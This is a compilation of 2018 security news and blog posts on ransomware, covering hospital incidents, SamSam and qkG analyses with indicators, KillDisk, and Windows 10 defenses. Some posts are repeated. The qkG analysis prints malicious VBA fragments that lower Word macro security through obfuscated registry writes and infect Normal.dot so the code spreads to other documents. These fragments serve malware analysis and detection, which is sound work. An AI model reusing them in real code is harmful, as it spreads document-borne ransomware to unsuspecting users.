An engineering firm in Canada has paid attackers $1,300 after ransomware encrypted its servers along with its data backup system. The infection occurred when bad actors targeted DGH Engineering Ltd. with a malicious email. An employee at the firm, which maintains offices near Winnipeg, Manitoba and Red Deer, Alberta, clicked on a clink contained therein. […]… Read More

The post Engineering Firm Pays $1.3K after Ransomware Affects Servers, Backups appeared first on The State of Security.

qkG: Simple Malware, Tricky Ransomware

By Oleg Boyarchuk, edited by Stefano Ortolani

Introduction

When ransomware behavior is clearly exhibited, it is relatively easy for a sandbox or a personal A/V to assert detection; after all, in its simplest form, ransomware malware must at least: (1) search for files to be encrypted, and (2) overwrite those files with their encrypted representation. Lastline Labs’ Alexander Sevtsov covered a deep dive on ransomware behavior not so long ago in Ransomware: Too Overt to Hide. Nevertheless, when it comes to detecting ransomware targeting specific files, things might get a tad more complicated. This is the case of qkG, a malware (sha1=a9174fec5d81977eee9de2658a92fa9e4de76dd4) designed to infect documents and encrypt their content (our friends at TrendMicro did an excellent job outlining the encryption process and uncovering the encryption key in this report).

How it Works

Documents infected by qkG come with an embedded VBA script that gets executed when the document is opened (note that macros must be manually enabled for the malicious code to execute). The VBA includes the following ransom note (which, incidentally, is unique and thus a good candidate for a YARA signature):

Signature = "I'm QkG@PTM17! by TNA@MHT-TT2"
sInfo = "Send $300 to BTC Address: 14zA1NdTgtesLWZxtysLQQtsuKzjFbpydg" & vbCrLf & "Contact Email: mht-tt2@protonmail.com"

qkG infects the Normal.dot template file, resulting in any other document opened by the user to become infected. Obviously, in order to avoid suspicion, qkG immediately tries to lower the Microsoft Office security settings in order to both access the VBA object model and enable macros permanently:

System.PrivateProfileString("", "HKEY_CUR" + "RENT_USER\Sof" + "tware\Micros" + "oft\Off" + "ice\" & Ver & "\Wo" + "rd\Secu" + "rity", "Acces" + "sVBOM") = 1
System.PrivateProfileString("", "HKEY_CUR" + "RENT_USER\Sof" + "tware\Micros" + "oft\Off" + "ice\" & Ver & "\Wo" + "rd\Secu" + "rity", "VBAW" + "arnings") = 1

This is done via the System.PrivateProfileString property, which has the interesting feature of writing REG_SZ values rather than REG_DWORD. Unfortunately, a fact that the malware authors must have overlooked, Microsoft Word is not able to read REG_SZ values. This means that opening an infected document will always require the following two conditions to be met, regardless of what the code actually tried to achieve:

  1. The VBA object model must have been manually enabled by the user:
  2. Macros must be enabled every single time a document is opened.

Note that even if the malware fails to automatically enable macros, the Lastline sandbox still detects this attempt and reports it as “Lowering macro security” with a high score. If condition (1) is met, qkG infects Normal.dot with its own code:

Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
...
If NTLines > 0 Then NT.CodeModule.DeleteLines 1, NTLines
NT.Name = "qkG"
NT.CodeModule.AddFromString ("Private Sub Document_Close()")
NT.CodeModule.InsertLines 2, AD.CodeModule.Lines(2, ADLines - 1)

The code inside Normal.dot is then used to infect any other document the user might open afterwards:

Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
...
If ADLines > 0 Then AD.CodeModule.DeleteLines 1, ADLines
AD.Name = "qkG"
AD.CodeModule.AddFromString ("Private Sub Document_Open()")
AD.CodeModule.InsertLines 2, NT.CodeModule.Lines(2, NTLines - 1)

Generally speaking, modifying macro code via CodeModule.DeleteLines and CodeModule.InsertLines is a suspicious activity per-se, and it is in fact flagged as such by the Lastline static document analyzer. As we can see from the code itself, the actual infection happens when the document is closed (Document_Close()), showing how important is for a sandbox to faithfully replicate the activity of a real user.

A Peculiar Behavior

Every time a document is either opened or closed, the malware encrypts the whole text and prepends the following ransom note:

This is quite unique, and it deviates from the ransomware behavior we usually see in malware such as WannaCry or BadRabbit where all files matching a set of extensions get encrypted. In this case, encryption, and thus the actual ransomware behavior, is tied to what the user is doing, and in particular to what documents he/she opens. Any technique tailored to detect ransomware in the general case would just fail here.

Conclusion

The malware does not enumerate or modify other files; it only encrypts a file when the user opens it by replacing its content. Because of all these reasons, automatically detecting this behavior as ransomware can be challenging if only generic behavioral techniques are used. A much more effective approach is instead a combination of static and dynamic analysis aimed at detecting as many behaviors as possible, hunting for those even a bit suspicious like modifying the macro code or altering the template file.

The post qkG: Simple Malware, Tricky Ransomware appeared first on Lastline.

SamSam – The Evolution Continues Netting Over $325,000 in 4 Weeks


This post was written by Vitor Ventura

Introduction


Talos has been working in conjunction with Cisco IR Services on what we believe to be a new variant of the SamSam ransomware. This ransomware has been observed across multiple industries including Government, Healthcare and ICS. These attacks do not appear to be highly targeted, and appear to be more opportunistic in nature.

Given SamSam's victimology, its impacts are not just felt within the business world, they are also impacting people, especially if we consider the Healthcare sector. Non-urgent surgeries can always be rescheduled but if we take as an example patients where the medical history and former medical treatment are crucial the impact may be more severe. Furthermore, many critical life savings medical devices are now highly computerized. Ransomware can impact the operation of these devices making it very difficult for medical personnel to diagnose and treat patients leading to potentially life threatening situations. Equipment that might be needed in time-sensitive operations may be made unavailable due to the computer used to operate the equipment being unavailable.

The initial infection vector for these ongoing attacks is currently unknown and Talos is investigating this in order to identify it. The history of SamSam indicates that attackers may follow their previous modus operandi of exploiting a host and then laterally moving within their target environment to plant and later run the SamSam ransomware. Previously, we observed the adversaries attacking vulnerable JBoss hosts during a previous wave of SamSam attacks in 2016. Although the infection vector for the new variant is not yet confirmed, there is a possibility that compromised RDP/VNC servers have played a part in allowing the attackers to obtain an initial foothold.


There are no differences between the encryption mechanism used by this current SamSam variant compared to older versions. However, this time the adversaries have added some string obfuscation and improved the anti-analysis techniques used to make detection and analysis marginally more difficult.

This new variant is deployed using a loader which decrypts and executes an encrypted ransomware payload, this loader/payload model represents an improvement in the anti-forensic methods used by the malware. Samples containing this loader mechanism have been found as far back as October 2017. The wallet used by SamSam for this wave is shared by multiple infected victims as observed by monitoring the wallet at 1MddNhqRCJe825ywjdbjbAQpstWBpKHmFR. We are also able to confirm the first payment into this wallet was received on 25th December 2017 - a nice holiday gift for this adversary. This can be confirmed by observing the first wallet transaction found on the Bitcoin blockchain here. There is a possibility that other Bitcoin wallets are also used but currently Talos is currently unaware of any others.

Similar to the previous variants, we believe the deployment of this SamSam variant to be highly manual, meaning an adversary must take manual action in order to execute the malware. The symmetric encryption keys are randomly generated for each file. The Tor onion service and the Bitcoin wallet address are hardcoded into the payload whilst the public key is stored in an external file with the extension .keyxml.

Additionally, code analysis didn't find any kind of automated mechanism for contacting the Tor Service address which means that the victim identification with the associated RSA private key must be done either manually or by another adversary tool.

Ransom note displayed by SamSam new variant

In most ransomware the attackers try to convince affected users that they have the ability to decrypt the data after the payment is made. SamSam is no different here and even displays a disclaimer as seen in the above screenshot, stating 'we don't want to damage our reliability' and 'we are honest'.

To this end SamSam adversaries offer free decryption of two files and an additional free key to decrypt one server. Once again SamSam actors show their ability to monitor and laterally move through the network by pointing out they will only provide a key if they believe the server is not an important piece of infrastructure. As with previous versions of SamSam they are advising that messaging the attackers can be performed via their site.

The "Runner"


The adversary has changed their deployment methodology and now they use a loader mechanism called "runner" to execute the payload. Upon execution, the loader will search for files with the extension .stubbin in its execution directory, this file contains the SamSam encrypted .NET Assembly payload. Upon reading the file, the loader decrypts the payload with the password supplied as the first argument and executes it, passing the remaining arguments.

The loader is a very simple .NET assembly with no obfuscation. Comparing both the Initialization Vector (IV) and the code structure it seems like it may have been derived from an example posted on the Codeproject.com website.

As you can seen in the images below, the IV used for the Rijndael encryption is the same in both implementations (posted code in hexadecimal, reversed code in decimal due to decompiler implementation).

Posted codeReversed code


At the code level looking specifically at the function 'Decrypt', it is obvious that the code structure in the Codeproject source and the latest SamSam runner sample is the same (comments from the posted code were removed).

Encryption routine source code comparison

The Payload


Previous versions of SamSam put some effort into the obfuscation of the malware code by encrypting strings with AES. The new version also obfuscates functions, class names and strings, including the list of targeted file extensions, the help file contents and environment variables, this time using DES encryption with a fixed hard-coded key and the IV.


Once again, the adversary has put more effort into preventing the forensic recovery of the malware sample itself rather than only relying on the obfuscation the running malware code, which allowed us to reverse engineer this sample.

As mentioned before, the password to decrypt the payload is passed as a parameter to the loader, which reduces the chances of obtaining the payload for analysis.

Previous versions of SamSam had an equivalent method for making payload access difficult by launching a thread that would wait 1 second before deleting itself from the hard disk.

The comparison of the main encryption routines between the old and the new samples indicates that this version of SamSam is similar enough to have high confidence that it belongs to the same malware family.

Encryption Routine Comparison

While previous SamSam versions used the API call DriveInfo.GetDrives() to obtain the list of available drives, this new version has the drive letters hardcoded. After checking that a drive is ready it starts a search for targeted files on the non-blacklisted folder paths.

The new variant keeps the same list of targeted file extensions as some of the previous ones. It adds a few new entries to the list of paths not to encrypt, which includes user profiles "All Users", "default" and the boot directory.

This is in tune with most ransomware which attempt to preserve the operability of the victim's machine. If the machine operation is so damaged that the system cannot be booted then the victim will be unable to pay, whereas if they keep the machine able to function, with limited access to files/folders, then they have a greater chance of a victim paying for recovering their important files and documents.



Just like previous versions of SamSam the new version is especially careful to make sure that there is enough space on the current drive to create the encrypted document, thus avoiding any corruption that would lead to irrecoverable encryption.



Unlike most ransomware, SamSam does not delete Volume Shadow Copies and creates an encrypted version of the original file which is then deleted using the regular Windows API. Although unlikely, due to block overwriting, recovery of the original files from the versions of affected folders saved by the operating system may be possible.

Profitability


In identifying the scope of this SamSam campaign, Talos analyzed the Bitcoin wallet addresses used by the attackers in each of these attacks. As of the time of this writing, the attackers have received approximately 30.4 BTC which equals $325,217.07. As previously mentioned, it is possible that the attackers are leveraging multiple bitcoin wallets, however Talos has not observed any other than the one listed here being used in these attacks.


Recommendations


As the specific initial threat vector is not known at this time, best practices should be implemented to minimize risk to organizations. Talos has outlined several best practices that should be considered in a previous blog related to defending against ransomware related threats. In accordance with best practices protocols like SMB or RDP should never be internet facing.

IOCs

SHA256s

0785bb93fdb219ea8cb1673de1166bea839da8ba6d7312284d2a08bd41e38cb9
338fdf3626aa4a48a5972f291aacf3d6172dd920fe16ac4da4dd6c5b999d2f13
3531bb1077c64840b9c95c45d382448abffa4f386ad88e125c96a38166832252
4856f898cd27fd2fed1ea33b4d463a6ae89a9ccee49b134ea8b5492cb447fb75
516fb821ee6c19cf2873e637c21be7603e7a39720c7d6d71a8c19d8d717a2495
72832db9b951663b8f322778440b8720ea95cde0349a1d26477edd95b3915479
754fab056e0319408227ad07670b77dde2414597ff5e154856ecae5e14415e1a
88d24b497cfeb47ec6719752f2af00c802c38e7d4b5d526311d552c6d5f4ad34
88e344977bf6451e15fe202d65471a5f75d22370050fe6ba4dfa2c2d0fae7828
8eabfa74d88e439cfca9ccabd0ee34422892d8e58331a63bea94a7c4140cf7ab
8f803b66f6c6bc4da9211a2c4c4c5b46a113201ecaf056d35cad325ec4054656
dabc0f171b55f4aff88f32871374bf09da83668e1db2d2c18b0cd58ed04f0707
e7bebd1b1419f42293732c70095f35c8310fa3afee55f1df68d4fe6bbee5397e

BTC Wallet

1MddNhqRCJe825ywjdbjbAQpstWBpKHmFR

Tor onion service

jcmi5n4c3mvgtyt5.onion

References:


https://www.codeproject.com/kb/security/dotnetcrypto.aspx?msg=1790665

Detection


Snort Rules: 45484-45486

AMP for Endpoints: Ensure the TETRA engine and ‘Command Line Capture’ are enabled and client is v6.05+

Another Indiana Hospital Hit by Ransomware Attack

Another hospital in Indiana has suffered a ransomware attack that affected some of its servers and prevented files from loading correctly. On 11 January, an employee of Adams Memorial Hospital of Decatur, Indiana notified administrators that some files didn’t look correct. Susan Sefton, a spokesperson for the hospital, said the network went blank before files […]… Read More

The post Another Indiana Hospital Hit by Ransomware Attack appeared first on The State of Security.

Is 2018 the year cybercrime becomes mainstream?

The issue of cybercrime was thrust into international conversation last year, but what will the phenomenon look like in 2018?Cryptocurrencies will continue to be a driver for cybercrime. This is

The post Is 2018 the year cybercrime becomes mainstream? appeared first on The Cyber Security Place.

McAfee Blogs: How Pseudo-ransomware KillDisk Creates a Smoke Screen for Cybercriminals

We all remember Petya/NotPetya. How could you forget? The nasty malware took cues from WannaCry, leveraging the same SMB vulnerability. But instead of locking away files, Petya/NotPetya was a wiper – simply cleaning devices of their data. Petya was not the first wiper we’ve seen, and it’s certainly not the last. In fact, a classic disk wiper is currently re-emerging in Latin America, called KillDisk, and is targeting financial firms. Once dropped on a computer, it will load itself into memory, delete its files from disk, and rename itself.

KillDisk is actually one of the most infamous malware families around. It has historically masked itself as ransomware, but is rather a very destructive wiper. Cybercriminals typically deploy it in the later stages of an infection so they can use it to hide their tracks by wiping disks and destroying forensic evidence. That’s precisely why it was paired together with the BlackEnergy malware during Telebots’ attacks on the Ukrainian power grid – so the cybercriminals could conduct their scheme with stealth.

As Christiaan Beek, lead scientist and principal engineer at McAfee claims – that’s a wiper’s bread and butter. He says, “In the past we have seen wipers being used targeting the Energy sector in the Ukraine, Oil & Gas industry in the Middle-East, Media-company and against targets in South Korea. All of these were related to regional or political conflicts.”

Destruction is clearly the end goal, but stealth is the way of getting there. Beek continues, “In 2017, we introduced the term pseudo-ransomware where destructive attacks disguised as ransomware either took down companies in a nation or were used to keep the IT-department busy while money was being transferred at the same time. Now with KillDisk, it seems that criminals do not hesitate to use it during their campaigns. Since the initial infection vector is unknown and we are lacking further samples or details, we can only speculate why they are using this.”

That’s the ultimate question – why? Is KillDisk part of a larger attack, intended to help cybercriminals avoid detection? Or are crooks extorting these financial institutions for monetary gain? As of now, we’re unsure of the motive. But we do know that as this threat continues to evolve and creates a convincing smoke screen, we all must be as vigilant as ever.

To learn more about our fight against ransomware, check out the alliance No More Ransom. And be sure to follow us at @McAfee and @McAfee_Labs.

The post How Pseudo-ransomware KillDisk Creates a Smoke Screen for Cybercriminals appeared first on McAfee Blogs.



McAfee Blogs

How Pseudo-ransomware KillDisk Creates a Smoke Screen for Cybercriminals

We all remember Petya/NotPetya. How could you forget? The nasty malware took cues from WannaCry, leveraging the same SMB vulnerability. But instead of locking away files, Petya/NotPetya was a wiper – simply cleaning devices of their data. Petya was not the first wiper we’ve seen, and it’s certainly not the last. In fact, a classic disk wiper is currently re-emerging in Latin America, called KillDisk, and is targeting financial firms. Once dropped on a computer, it will load itself into memory, delete its files from disk, and rename itself.

KillDisk is actually one of the most infamous malware families around. It has historically masked itself as ransomware, but is rather a very destructive wiper. Cybercriminals typically deploy it in the later stages of an infection so they can use it to hide their tracks by wiping disks and destroying forensic evidence. That’s precisely why it was paired together with the BlackEnergy malware during Telebots’ attacks on the Ukrainian power grid – so the cybercriminals could conduct their scheme with stealth.

As Christiaan Beek, lead scientist and principal engineer at McAfee claims – that’s a wiper’s bread and butter. He says, “In the past we have seen wipers being used targeting the Energy sector in the Ukraine, Oil & Gas industry in the Middle-East, Media-company and against targets in South Korea. All of these were related to regional or political conflicts.”

Destruction is clearly the end goal, but stealth is the way of getting there. Beek continues, “In 2017, we introduced the term pseudo-ransomware where destructive attacks disguised as ransomware either took down companies in a nation or were used to keep the IT-department busy while money was being transferred at the same time. Now with KillDisk, it seems that criminals do not hesitate to use it during their campaigns. Since the initial infection vector is unknown and we are lacking further samples or details, we can only speculate why they are using this.”

That’s the ultimate question – why? Is KillDisk part of a larger attack, intended to help cybercriminals avoid detection? Or are crooks extorting these financial institutions for monetary gain? As of now, we’re unsure of the motive. But we do know that as this threat continues to evolve and creates a convincing smoke screen, we all must be as vigilant as ever.

To learn more about our fight against ransomware, check out the alliance No More Ransom. And be sure to follow us at @McAfee and @McAfee_Labs.

The post How Pseudo-ransomware KillDisk Creates a Smoke Screen for Cybercriminals appeared first on McAfee Blogs.

Webroot Threat Blog: Cyber News Rundown: Healthcare Ransomware

The Cyber News Rundown brings you the latest happenings in cybersecurity news weekly. Who am I? I’m Connor Madsen, a Webroot Threat Research Analyst, and a guy with a passion for all things security. Any questions? Just ask.

Hospital Pays Ransom to Restore Systems, Despite Having Backups

In the first cyberattack of 2018 to hit a healthcare organization, an Indiana hospital’s entire network was taken offline. Despite having full backups on-hand, the hospital paid the $55,000 Bitcoin ransom right away. Officials stated they paid the ransom to get the systems back to normal as quickly as possible, since restoring everything from their backups could have taken weeks. Fortunately for patients, no data was stolen, and the staff could continue assisting new arrivals the old-fashioned way (that’s right: pen and paper) until system functionality was restored.

Audio Attacks Used for Damaging Hard Drives

A recent collaborative study performed by two universities proved that, within a reasonable proximity, an attacker could use acoustic signals to target a hard disk drive, leading to data corruption on the device. While many people could explain why this type of attack is possible, the study determined that the attacks required not only a specific frequency based on the hard drive in question, but also a precise distance from the drive and angle of sound projection to execute a successful attack.

New Android Platform Takes Spying to New Heights

A new Android spying platform has been discovered that puts all its predecessors to shame. By implementing several new features, such as location-based audio recording, compromising WhatsApp messages, and even allowing attackers to connect the device to malicious WiFi networks, this software platform gives attackers an all-new range of methods to target victims. The platform is based around five known exploits in the Android OS, and it uses them to gain administrative access to the device.

Latest Netflix Phish Asks for User Selfie

Within the last week, a new email phishing campaign has been spotted targeting Netflix users. The email informs users that a “hold” has been placed on their account pending further information. It requests users upload a photo of themselves with an ID card and prompts them to update their billing information, before redirecting them to the real Netflix login page.

RubyMiner Found on Older Linux and Windows Servers

A new cryptocurrency miner variant has been targeting outdated system servers that run both Linux and Windows. The variant, known as RubyMiner, identifies the unsecured servers using a web server tool, then gains access via a variety of exploits to install a modified Monero miner. RubyMiner deviates from similar miners in that it focuses on machines that have likely been forgotten about, and so remain on without being regularly patched.

The post Cyber News Rundown: Healthcare Ransomware appeared first on Webroot Threat Blog.



Webroot Threat Blog

HOTforSecurity: ‘Im Sorry’ – Second Indiana hospital hit by ransomware

The very day that Hancock Health fell victim to a ransomware attack, another hospital in Indiana suffered a similar breach. Adams Health Network, which runs Adams Memorial Hospital, said the attack did not affect the quality and safety of patient care.

As the story goes, on December 11 an employee at Adams Memorial Hospital noticed strange network behavior and alerted IT administrators. Susan Sefton, a spokesperson for Adams Memorial Hospital, said the network went blank before files on the system read “sorry.”

If Sefton’s recollection is correct, it appears Adams Memorial was hit by a relatively well-known strain of ransomware dubbed “Im Sorry.”

Uncovered in 2017, Im Sorry encrypts files on the computer it has infected and appends file names with the “.imsorry’ extension. For instance, a Word document titled “Filename.docx” will be renamed to “Filename.docx.imsorry.”

After it encrypts files on a system, the ransomware creates a text file containing instructions telling users how and where to pay a ransom to decrypt them. The .txt file is placed in each folder that has encrypted files.

As a result of the breach, doctors could not access patient history or appointment schedules, according to local newspaper wane.com. Sefton said the attack affected 60 to 80 patients. At first, the hospital avoided making the attack public, attributing the outage to bad weather. Then, it released the following statement:

“While AHN did experience a business interruption throughout the weekend as we worked to restore the affected severs, there was never an interruption in patient care. We are continuing to assess the severity of the situation, but at this time we believe no patient files have been accessed. At no time during this event has the quality and safety of patient care been affected.”

The hospital got hit on the same day that Hancock Health, another healthcare operator based in the state of Indiana, confirmed it fell victim to an almost identical attack. While Adams has not yet said if it has paid or will pay the ransom, Hanckock has reportedly already paid the attacker $50,000 in digital currency to have its files decrypted.



HOTforSecurity

‘Im Sorry’ – Second Indiana hospital hit by ransomware

The very day that Hancock Health fell victim to a ransomware attack, another hospital in Indiana suffered a similar breach. Adams Health Network, which runs Adams Memorial Hospital, said the attack did not affect the quality and safety of patient care.

As the story goes, on December 11 an employee at Adams Memorial Hospital noticed strange network behavior and alerted IT administrators. Susan Sefton, a spokesperson for Adams Memorial Hospital, said the network went blank before files on the system read “sorry.”

If Sefton’s recollection is correct, it appears Adams Memorial was hit by a relatively well-known strain of ransomware dubbed “Im Sorry.”

Uncovered in 2017, Im Sorry encrypts files on the computer it has infected and appends file names with the “.imsorry’ extension. For instance, a Word document titled “Filename.docx” will be renamed to “Filename.docx.imsorry.”

After it encrypts files on a system, the ransomware creates a text file containing instructions telling users how and where to pay a ransom to decrypt them. The .txt file is placed in each folder that has encrypted files.

As a result of the breach, doctors could not access patient history or appointment schedules, according to local newspaper wane.com. Sefton said the attack affected 60 to 80 patients. At first, the hospital avoided making the attack public, attributing the outage to bad weather. Then, it released the following statement:

“While AHN did experience a business interruption throughout the weekend as we worked to restore the affected severs, there was never an interruption in patient care. We are continuing to assess the severity of the situation, but at this time we believe no patient files have been accessed. At no time during this event has the quality and safety of patient care been affected.”

The hospital got hit on the same day that Hancock Health, another healthcare operator based in the state of Indiana, confirmed it fell victim to an almost identical attack. While Adams has not yet said if it has paid or will pay the ransom, Hanckock has reportedly already paid the attacker $50,000 in digital currency to have its files decrypted.

The rise of ransom hacks, and the potential impact on your business

The percentage of companies reporting financially motivated cyber attacks has doubled over the past two years, with 50% of companies experiencing a cyber attack motivated by ransom in the past year, according to Radware. As the value of bitcoin and other cryptocurrencies has appreciated, ransom attacks provide an opportunity for hackers to cash out for lucrative gains months later. Ransom attacks “The rapid adoption of cryptocurrencies and their subsequent rise in price has presented hackers … More

Hospital Shut Down Its Computer Network Following Ransomware Attack

A hospital shut down its network after a ransomware attack restricted authorized personnel access to some of its computer systems. On 12 January, Hancock Regional Hospital confirmed in a statement that it had suffered a ransomware attack. As quoted by FOX59: Hancock Regional Hospital has been the victim of a criminal act by an unknown […]… Read More

The post Hospital Shut Down Its Computer Network Following Ransomware Attack appeared first on The State of Security.

Ransomware attack drives Indianapolis hospital back to pen and paper

A hacker out to make a fast buck last week decided to hit an Indianapolis hospital with a ransomware attack, demanding a ransom payment to his Bitcoin wallet in exchange for de-crippling the facility’s computer network.

Hancock Health fell victim to the attack sometime last week, when employees noticed the network started running more slowly than normal, according to local newspaper The Greenfield Reporter.

One of the hospital’s computers then flashed a message indicative of a typical ransomware attack – that the facility’s data was being held “hostage” until a ransom was paid to the attacker.

The hacker, who infiltrated the network using a “sophisticated” attack, encrypted important parts of the Hancock Health network and demanded an undisclosed ransom in Bitcoin, a digital currency almost entirely untraceable in nature.

“This was not a 15-year-old kid sitting in his mother’s basement,” Hancock Health CEO Steve Long told reporters on Friday, after enlisting the help of the FBI and an unnamed security firm to learn more about the attack.

“That somebody would do this to a hospital really boggles the mind,” Long said.

According to the newspaper, the attack drove doctors and nurses back to using “pen and paper” to keep medical charts updated.

According to a recent survey by University of Phoenix College of Health Professions, hackers are increasingly targeting patient records as healthcare providers do little to protect their data. The key reason, according to a healthcare cyber research report for 2017: stolen medical records make for a lucrative extortion tool.

Patient records can be so valuable that some organizations will go to great lengths to obtain them, even if it means doing so without the patients’ consent.

An investigation by the Daily Telegraph has revealed that the data covering every case of lung cancer diagnosed in England over a four-year period was handed by NHS to a firm working with Philip Morris International for the past 30 years. Investigators reportedly fear that the anonymised data could be used in legal cases to downplay the dangers of smoking, or to fight regulation.

Coprocessor Attacks: the Hidden Threat

Botnets, DDoS and ransomware attacks, vulnerabilities in Internet of Things devices and Open Source Software, and the generally poor state of information security, dominate the discussion of cybersecurity. These same

The post Coprocessor Attacks: the Hidden Threat appeared first on The Cyber Security Place.

The network vulnerabilities hiding in plain sight

Any company wanting to redefine its network security strategies in the wake of substantial IoT growth should start with the following four steps.There is no denying that, for better or

The post The network vulnerabilities hiding in plain sight appeared first on The Cyber Security Place.

Unknown Hackers demand Ransom in Bitcoin

Recently the news came out of a ransomware attack in Old Delhi after three of the hacked victims came forward to uncover more about the attack. The victims i.e. the traders were demanded ransom in Bitcoin from the unknown hackers.

Although it is believed that the hackers are supposedly from either Nigeria or Pakistan, they were responsible for encrypting files on the computers of the businessmen which comprised of key records. The hackers at that point, as indicated by the police coerced the victims, gave them the links to purchase bitcoins through which they needed to make payments for the release of critical documents.

 “Some traders paid in Bitcoins and got their data back. Some deposited the money from abroad. When my data was hacked, I spoke to fellow traders and learnt that there were other such cases. I wrote to the hackers and they agreed to decrypt the files for $1,750 (around Rs 1.11 lakh),” Mohan Goyal, one of the victims was quoted saying in the report.

According to reports, the hacked traders found the message that said there was a 'security issue' in the system displayed on their computers. The traders were then given case numbers and email addresses for correspondence. They were then at first offered decryption of five of their documents and files for free by the hackers, who later demanded the payment of ransom for the rest of the records.

While one of the IP address utilized by hackers was purportedly traced back to a system in Germany, but the fingers remain pointed towards hackers from Nigeria and Pakistan.

Experts say that for making it difficult to trace the money, getting the money in bitcoin works for the hackers. The Delhi crime branch which registered the FIR has already sent the hard disks of the complainants for further forensic tests. As of not long ago, three complaints already have been registered by the police and it is believed that the number of victims could be much higher.

Hackers increasingly target patient records as HCPs do little to protect data – research

One in five healthcare professionals has experienced breaches of patient data, yet many also say they’re “very confident” in their facility’s ability to protect that data against theft, according to a survey by University of Phoenix College of Health Professions.

Despite increased data breaches in all industries, only a quarter of registered nurses (RNs) have seen changes in the way their companies handle data security over the past year.

The data also reveals a worrying disconnect between healthcare professionals’ confidence in protecting sensitive patient data and the actual protection of that data.

Some 48% of RNs and 57 percent of administrative staff say they are “very confident” their institution can safeguard patient records against potential data theft. At the same time, only 25 percent of RNs and 40 percent of administrative staff cited data security & privacy improvements over the past year.

The University acknowledges that the healthcare industry is “one of the highest targeted by cybercriminals, due to its heavy reliance on technology and vast amount of available patient data.”

Research by Cryptonite NXT supports this claim. According to the company’s Health Care Cyber Research Report for 2017, stolen medical records make for a terrific extortion tool.

One example is the London Bridge Plastic Surgery data breach three months ago, when The Dark Overlord cybercriminal group hacked the high-profile clinic and stole graphic images of celebrities undergoing plastic surgery. The purpose behind the breach was believed to be extortion. No reports confirm this theory, but it’s possible the group got what they were after and kept a lid on it.

Dennis Bonilla, executive dean for the College of Information Systems and Technology at University of Phoenix, believes healthcare providers (HCPs) are “extremely susceptible to human error.”

“If one employee accidently invites malicious malware into a system, the impact can be catastrophic. To limit the amount of breaches, cybersecurity governance must improve,” Bonilla said.

Again, the University’s findings can be easily supported with real-life examples. The WannaCry ransomware attack in May 2017 revealed just how easily malware could move laterally in a computer network.

As avid readers know, the UK’s National Health Service lost hundreds of thousands of patient records in the attack, which leveraged unpatched Windows computers. Patients with life-threatening conditions had to be put on hold, and the financial consequences to NHS were devastating.

On a positive note, nurses and staff administrators agree that additional support and training is needed for healthcare privacy and security. The survey also found that HCPs are taking some steps to better protect patient data, such as updated privacy and access policies, role-based access to sensitive information, and enhanced data surveillance.

A worthy upgrade: Next-gen security on Windows 10 proves resilient against ransomware outbreaks in 2017

Adopting reliable attack methods and techniques borrowed from more evolved threat types, ransomware attained new levels of reach and damage in 2017. The following trends characterize the ransomware narrative in the past year:

  • Three global outbreaks showed the force of ransomware in making real-world impact, affecting corporate networks and bringing down critical services like hospitals, transportation, and traffic systems
  • Three million unique computers encountered ransomware; millions more saw downloader trojans, exploits, emails, websites and other components of the ransomware kill chain
  • New attack vectors, including compromised supply chain, exploits, phishing emails, and documents taking advantage of the DDE feature in Office were used to deliver ransomware
  • More than 120 new ransomware families, plus countless variants of established families and less prevalent ransomware caught by heuristic and generic detections, emerged from a thriving cybercriminal enterprise powered by ransomware-as-a-service

The trend towards increasingly sophisticated malware behavior, highlighted by the use of exploits and other attack vectors, makes older platforms so much more susceptible to ransomware attacks. From June to November, Windows 7 devices were 3.4 times more likely to encounter ransomware compared to Windows 10 devices.

Figure 1. Ransomware encounter rates on Windows 7 and Windows 10 devices. Encounter rate refers to the percentage of computers running the OS version with Microsoft real-time security that blocked or detected ransomware.

The data shows that attackers are targeting Windows 7. Given todays modern threats, older platforms can be infiltrated more easily because these platforms dont have the advanced built-in end-to-end defense stack available on Windows 10. Continuous enhancements further make Windows 10 more resilient to ransomware and other types of attack.

Windows 10: Multi-layer defense against ransomware attacks

The year 2017 saw three global ransomware outbreaks driven by multiple propagation and infection techniques that are not necessarily new but not typically observed in ransomware. While there are technologies available on Windows 7 to mitigate attacks, Windows 10s comprehensive set of platform mitigations and next-generation technologies cover these attack methods. Additionally, Windows 10 S, which is a configuration of Windows 10 thats streamlined for security and performance, locks down devices against ransomware outbreaks and other threats.

In May, WannaCry (Ransom:Win32/WannaCrypt) caused the first global ransomware outbreak. It used EternalBlue, an exploit for a previously fixed SMBv1 vulnerability, to infect computers and spread across networks at speeds never before observed in ransomware.

On Windows 7, Windows AppLocker and antimalware solutions like Microsoft Security Essentials and System Center Endpoint Protection (SCEP) can block the infection process. However, because WannaCry used an exploit to spread and infect devices, networks with vulnerable Windows 7 devices fell victim. The WannaCry outbreak highlighted the importance of keeping platforms and software up-to-date, especially with critical security patches.

Windows 10 was not at risk from the WannaCry attack. Windows 10 has security technologies that can block the WannaCry ransomware and its spreading mechanism. Built-in exploit mitigations on Windows 10 (KASLR, NX HAL, and PAGE POOL), as well as kCFG (control-flow guard for kernel) and HVCI (kernel code-integrity), make Windows 10 much more difficult to exploit.

Figure 2. Windows 7 and Windows 10 platform defenses against WannaCry

In June, Petya (Ransom:Win32/Petya.B) used the same exploit that gave WannaCry its spreading capabilities, and added more propagation and infection methods to give birth to arguably the most complex ransomware in 2017. Petyas initial infection vector was a compromised software supply chain, but the ransomware quickly spread using the EternalBlue and EternalRomance exploits, as well as a module for lateral movement using stolen credentials.

On Windows 7, Windows AppLocker can stop Petya from infecting the device. If a Windows 7 device is fully patched, Petyas exploitation behavior did not work. However, Petya also stole credentials, which it then used to spread across networks. Once running on a Windows 7 device, only an up-to-date antivirus that had protection in place at zero hour could stop Petya from encrypting files or tampering with the master boot record (MBR).

On the other hand, on Windows 10, Petya had more layers of defenses to overcome. Apart from Windows AppLocker, Windows Defender Application Control can block Petyas entry vector (i.e., compromised software updater running an untrusted binary), as well as the propagation techniques that used untrusted DLLs. Windows 10s built-in exploit mitigations can further protect Windows 10 devices from the Petya exploit. Credential Guard can prevent Petya from stealing credentials from local security authority subsystem service (LSASS), helping curb the ransomwares propagation technique. Meanwhile, Windows Defender System Guard (Secure Boot) can stop the MBR modified by Petya from being loaded at boot time, preventing the ransomware from causing damage to the master file table (MFT).

Figure 3. Windows 7 and Windows 10 platform defenses against Petya

